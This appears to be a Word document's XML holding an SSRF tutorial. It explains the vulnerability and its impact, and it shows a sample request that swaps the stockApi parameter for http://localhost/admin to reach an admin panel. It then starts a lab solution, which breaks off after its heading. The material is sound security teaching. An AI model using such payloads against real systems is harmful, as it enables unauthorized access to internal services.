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4ACDD" w14:textId="77777777" w:rsidR="005E4E88" w:rsidRPr="00E4142C" w:rsidRDefault="005E4E88" w:rsidP="005E4E88">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
        </w:rPr>
        <w:t>What is SSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1638697D" w14:textId="77777777" w:rsidR="005E4E88" w:rsidRPr="00E4142C" w:rsidRDefault="005E4E88" w:rsidP="005E4E88">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A676C8" w14:textId="77777777" w:rsidR="005E4E88" w:rsidRPr="00E4142C" w:rsidRDefault="005E4E88" w:rsidP="005E4E88">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3393AA" w14:textId="5077167C" w:rsidR="005E4E88" w:rsidRPr="00E4142C" w:rsidRDefault="005E4E88" w:rsidP="005E4E88">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve"> In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A22107" w14:textId="32D88D9F" w:rsidR="006655E6" w:rsidRPr="00E4142C" w:rsidRDefault="00B00153">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="278420FA" wp14:editId="1159888F">
            <wp:extent cx="5943600" cy="343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0270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71EA1A" w14:textId="77777777" w:rsidR="005222FB" w:rsidRPr="00E4142C" w:rsidRDefault="005222FB" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is the impact of SSRF attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336736BD" w14:textId="77777777" w:rsidR="005222FB" w:rsidRPr="00E4142C" w:rsidRDefault="005222FB" w:rsidP="005222FB">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 xml:space="preserve">A successful SSRF attack can often result in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unauthorized actions or access to data within the organization,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> either in the vulnerable application itself or on other back-end systems that the application can communicate with. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EA76F" w14:textId="63223C11" w:rsidR="005222FB" w:rsidRPr="00E4142C" w:rsidRDefault="005222FB" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In some situations, the SSRF vulnerability might allow an attacker to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>arbitrary command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DA2BCF" w14:textId="4C4DDA58" w:rsidR="005222FB" w:rsidRPr="00E4142C" w:rsidRDefault="005222FB" w:rsidP="005222FB">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An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55155AED" w14:textId="77777777" w:rsidR="00E6031E" w:rsidRPr="00E4142C" w:rsidRDefault="00E6031E" w:rsidP="00E6031E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Common SSRF attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E0B12" w14:textId="77777777" w:rsidR="00E6031E" w:rsidRPr="00E4142C" w:rsidRDefault="00E6031E" w:rsidP="00E6031E">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lastRenderedPageBreak/>
        <w:t>SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable application and perform unauthorized actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F97DE0" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSRF attacks against the server itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F05F8" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In an SSRF attack against the server itself, the attacker induces the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This will typically involve supplying a URL with a hostname like </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (a reserved IP address that points to the loopback adapter) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (a commonly used name for the same adapter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5674BDDB" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">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For example, consider a shopping application that lets the user view whether an item is in stock in a particular store. To provide the stock information, the application must query various back-end REST APIs, dependent on the product and store in question. The function is implemented by passing the URL to the relevant back-end API endpoint via a front-end HTTP request. So when a user views the stock status for an item, their browser makes a request like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A44E54" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>POST /product/stock HTTP/1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DC933" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">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This causes the server to make a request to the specified URL, retrieve the stock status, and return this to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC9DD2" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">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In this situation, an attacker can modify the request to specify a URL local to the server itself. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F312B" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>POST /product/stock HTTP/1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi=http://localhost/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E1B16" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here, the server will fetch the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> URL and return it to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0971D404" w14:textId="77777777" w:rsidR="006912BC" w:rsidRPr="00E4142C" w:rsidRDefault="006912BC" w:rsidP="006912BC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Now of course, the attacker could just visit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> URL directly. But the administrative functionality is ordinarily accessible only to suitable authenticated users. So an attacker who simply visits the URL directly won't see anything of interest. However, when the request to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> URL comes from the local machine itself, the normal </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>access controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> are bypassed. The application grants full access to the administrative functionality, because the request appears to originate from a trusted location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B3AF4" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab: Basic SSRF against the local server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EC1F95" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884594B" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
